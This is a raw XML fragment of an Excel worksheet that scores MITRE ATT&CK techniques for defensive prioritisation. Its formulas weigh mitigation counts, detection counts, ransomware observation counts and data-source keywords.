      <c r="AL521" s="25" t="str" cm="1">
        <f t="array" ref="AL521">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC521)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM521" s="25">
        <f>IF(AL521="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN521" s="64">
        <v>0</v>
      </c>
      <c r="AO521" s="51"/>
      <c r="AP521" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ521" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR521" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS521" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT521" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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22" spans="1:47">
      <c r="A522" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B522" s="25">
        <f>SUM(H522,M522,V522)*(1+SUM(AE522,AG522,AI522,AK522,AM522))</f>
        <v>0.1</v>
      </c>
      <c r="C522" s="25" t="s">
        <v>1855</v>
      </c>
      <c r="D522" s="25" t="s">
        <v>1854</v>
      </c>
      <c r="E522" s="25" t="s">
        <v>1856</v>
      </c>
      <c r="F522" s="51">
        <v>1</v>
      </c>
      <c r="G522" s="51">
        <v>1</v>
      </c>
      <c r="H522" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I522">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J522">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K522">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L522">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M522" s="25">
        <v>0</v>
      </c>
      <c r="N522" s="51">
        <v>0</v>
      </c>
      <c r="O522" s="51">
        <v>0</v>
      </c>
      <c r="P522" s="51">
        <v>0</v>
      </c>
      <c r="Q522" s="51">
        <v>0</v>
      </c>
      <c r="R522" s="51"/>
      <c r="S522" s="51">
        <v>0</v>
      </c>
      <c r="T522" s="51"/>
      <c r="U522" s="51">
        <v>0</v>
      </c>
      <c r="V522" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W522">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X522">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y522">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z522">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA522">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB522">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC522" s="30"/>
      <c r="AD522" s="25" t="str" cm="1">
        <f t="array" ref="AD522">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC522)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE522" s="25">
        <f>IF(AD522="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF522" s="25" t="str" cm="1">
        <f t="array" ref="AF522">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC522)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG522" s="25">
        <f>IF(AF522="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH522" s="25" t="str" cm="1">
        <f t="array" ref="AH522">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC522)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI522" s="25">
        <f>IF(AH522="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ522" s="25" t="str" cm="1">
        <f t="array" ref="AJ522">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC522)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK522" s="25">
        <f>IF(AJ522="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL522" s="25" t="str" cm="1">
        <f t="array" ref="AL522">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC522)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM522" s="25">
        <f>IF(AL522="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN522" s="64">
        <v>0</v>
      </c>
      <c r="AO522" s="51"/>
      <c r="AP522" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ522" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR522" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS522" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT522" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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23" spans="1:47">
      <c r="A523" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B523" s="25">
        <f>SUM(H523,M523,V523)*(1+SUM(AE523,AG523,AI523,AK523,AM523))</f>
        <v>0.1</v>
      </c>
      <c r="C523" s="25" t="s">
        <v>1857</v>
      </c>
      <c r="D523" s="25" t="s">
        <v>1858</v>
      </c>
      <c r="E523" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F523" s="51">
        <v>1</v>
      </c>
      <c r="G523" s="51">
        <v>1</v>
      </c>
      <c r="H523" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I523">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J523">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K523">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L523">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M523" s="25">
        <v>0</v>
      </c>
      <c r="N523" s="51">
        <v>0</v>
      </c>
      <c r="O523" s="51">
        <v>0</v>
      </c>
      <c r="P523" s="51">
        <v>0</v>
      </c>
      <c r="Q523" s="51">
        <v>0</v>
      </c>
      <c r="R523" s="51"/>
      <c r="S523" s="51">
        <v>0</v>
      </c>
      <c r="T523" s="51"/>
      <c r="U523" s="51">
        <v>0</v>
      </c>
      <c r="V523" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W523">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X523">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y523">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z523">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA523">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB523">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC523" s="30"/>
      <c r="AD523" s="25" t="str" cm="1">
        <f t="array" ref="AD523">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC523)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE523" s="25">
        <f>IF(AD523="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF523" s="25" t="str" cm="1">
        <f t="array" ref="AF523">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC523)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG523" s="25">
        <f>IF(AF523="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH523" s="25" t="str" cm="1">
        <f t="array" ref="AH523">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC523)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI523" s="25">
        <f>IF(AH523="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ523" s="25" t="str" cm="1">
        <f t="array" ref="AJ523">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC523)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK523" s="25">
        <f>IF(AJ523="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL523" s="25" t="str" cm="1">
        <f t="array" ref="AL523">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC523)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM523" s="25">
        <f>IF(AL523="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN523" s="64">
        <v>0</v>
      </c>
      <c r="AO523" s="51"/>
      <c r="AP523" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ523" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR523" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS523" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT523" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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24" spans="1:47">
      <c r="A524" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B524" s="25">
        <f>SUM(H524,M524,V524)*(1+SUM(AE524,AG524,AI524,AK524,AM524))</f>
        <v>0.1</v>
      </c>
      <c r="C524" s="25" t="s">
        <v>1859</v>
      </c>
      <c r="D524" s="25" t="s">
        <v>1860</v>
      </c>
      <c r="E524" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F524" s="51">
        <v>1</v>
      </c>
      <c r="G524" s="51">
        <v>1</v>
      </c>
      <c r="H524" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I524">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J524">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K524">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L524">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M524" s="25">
        <v>0</v>
      </c>
      <c r="N524" s="51">
        <v>0</v>
      </c>
      <c r="O524" s="51">
        <v>0</v>
      </c>
      <c r="P524" s="51">
        <v>0</v>
      </c>
      <c r="Q524" s="51">
        <v>0</v>
      </c>
      <c r="R524" s="51"/>
      <c r="S524" s="51">
        <v>0</v>
      </c>
      <c r="T524" s="56" t="s">
        <v>1861</v>
      </c>
      <c r="U524" s="51">
        <v>0</v>
      </c>
      <c r="V524" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W524">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X524">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y524">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z524">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA524">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB524">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC524" s="30"/>
      <c r="AD524" s="25" t="str" cm="1">
        <f t="array" ref="AD524">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC524)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE524" s="25">
        <f>IF(AD524="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF524" s="25" t="str" cm="1">
        <f t="array" ref="AF524">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC524)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG524" s="25">
        <f>IF(AF524="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH524" s="25" t="str" cm="1">
        <f t="array" ref="AH524">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC524)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI524" s="25">
        <f>IF(AH524="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ524" s="25" t="str" cm="1">
        <f t="array" ref="AJ524">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC524)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK524" s="25">
        <f>IF(AJ524="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL524" s="25" t="str" cm="1">
        <f t="array" ref="AL524">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC524)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM524" s="25">
        <f>IF(AL524="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN524" s="64">
        <v>0</v>
      </c>
      <c r="AO524" s="51"/>
      <c r="AP524" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ524" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR524" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS524" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT524" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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25" spans="1:47">
      <c r="A525" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B525" s="25">
        <f>SUM(H525,M525,V525)*(1+SUM(AE525,AG525,AI525,AK525,AM525))</f>
        <v>0.1</v>
      </c>
      <c r="C525" s="25" t="s">
        <v>1862</v>
      </c>
      <c r="D525" s="25" t="s">
        <v>1863</v>
      </c>
      <c r="E525" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F525" s="51">
        <v>1</v>
      </c>
      <c r="G525" s="51">
        <v>1</v>
      </c>
      <c r="H525" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I525">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J525">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K525">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L525">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M525" s="25">
        <v>0</v>
      </c>
      <c r="N525" s="51">
        <v>0</v>
      </c>
      <c r="O525" s="51">
        <v>0</v>
      </c>
      <c r="P525" s="51">
        <v>0</v>
      </c>
      <c r="Q525" s="51">
        <v>0</v>
      </c>
      <c r="R525" s="51"/>
      <c r="S525" s="51">
        <v>0</v>
      </c>
      <c r="T525" s="51"/>
      <c r="U525" s="51">
        <v>0</v>
      </c>
      <c r="V525" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W525">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X525">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y525">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z525">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA525">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB525">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC525" s="30"/>
      <c r="AD525" s="25" t="str" cm="1">
        <f t="array" ref="AD525">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC525)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE525" s="25">
        <f>IF(AD525="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF525" s="25" t="str" cm="1">
        <f t="array" ref="AF525">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC525)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG525" s="25">
        <f>IF(AF525="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH525" s="25" t="str" cm="1">
        <f t="array" ref="AH525">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC525)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI525" s="25">
        <f>IF(AH525="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ525" s="25" t="str" cm="1">
        <f t="array" ref="AJ525">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC525)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK525" s="25">
        <f>IF(AJ525="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL525" s="25" t="str" cm="1">
        <f t="array" ref="AL525">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC525)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM525" s="25">
        <f>IF(AL525="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN525" s="64">
        <v>0</v>
      </c>
      <c r="AO525" s="51"/>
      <c r="AP525" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ525" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR525" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS525" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT525" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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26" spans="1:47">
      <c r="A526" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.166666666666667E-2</v>
      </c>
      <c r="B526" s="25">
        <f>SUM(H526,M526,V526)*(1+SUM(AE526,AG526,AI526,AK526,AM526))</f>
        <v>0.05</v>
      </c>
      <c r="C526" s="25" t="s">
        <v>1864</v>
      </c>
      <c r="D526" s="25" t="s">
        <v>1663</v>
      </c>
      <c r="E526" s="25" t="s">
        <v>1865</v>
      </c>
      <c r="F526" s="51">
        <v>0</v>
      </c>
      <c r="G526" s="51">
        <v>1</v>
      </c>
      <c r="H526" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I526">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J526">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K526">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L526">
